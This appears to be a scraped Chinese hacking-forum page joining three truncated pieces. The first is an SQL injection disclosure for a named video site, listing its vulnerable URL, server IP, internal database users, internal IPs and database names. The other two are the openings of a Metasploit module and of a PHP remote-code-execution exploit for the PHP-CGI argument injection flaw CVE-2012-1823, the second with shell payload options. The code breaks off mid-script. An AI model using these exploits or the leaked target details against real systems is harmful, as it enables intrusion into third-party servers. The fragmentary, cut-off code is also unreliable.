六间房视频网站(6.cn) m.6.cn SQL注入漏洞一枚

Target: http://m.6.cn/detail.php?id=461553 Host IP: 116.252.179.16 Web Server: nginx/0.6.14 DB Server: MySQL Resp. Time(avg): 319 ms Current User: movie@172.16.0.82 Sql Version: 5.0.75-percona-highperf-b12-log Current DB: m6cn System User: movie@172.16.0.81 Host Name: sdb60 Installation dir: /usr/local/mysql-5.0.75-percona-highperf-b12/ DB User: 'movie'@'172.16.0.%' Data Bases: information_schema m6cn 首发 www.im4hk.com,作者:shadow@lcx.

CVE-2012-1823 php-cgi 漏洞 metasploit 利用脚本

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP CGI Argument Injection', 'Description' => %q{ When run

PHP CGI Argument Injection Exploit CVE-2012-1823

<?php /* *PHP CGI Argument Injection Exploit CVE-2012-1823 *by:cfking *bbs:www.90sec.org */ set_time_limit(0); $help=' [>] php-cgi Remote code Execution Exploit CVE-2012-1823 [>] by:cfking@90sec.org [>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port> [>] Example: php '.$argv[0].' 127.0.0.1 / 2 '; if($argc<4)exit($help); print_r (' [>] PHP CGI Argument Injection Exploit CVE-2012-1823 [>] by:cfking@90sec.org'); $host=$argv[1]; $filename=$argv[2]; if($argv[3]=='1'){ $port=$argv[5]? $argv[5]:4444; if(!$argv[4])exit("\n[-] Please enter IP and PORT\n"); print "\n[+] Bindshell IP $argv[4] PORT $port\n"; $payload=$argv[4].':'.$port;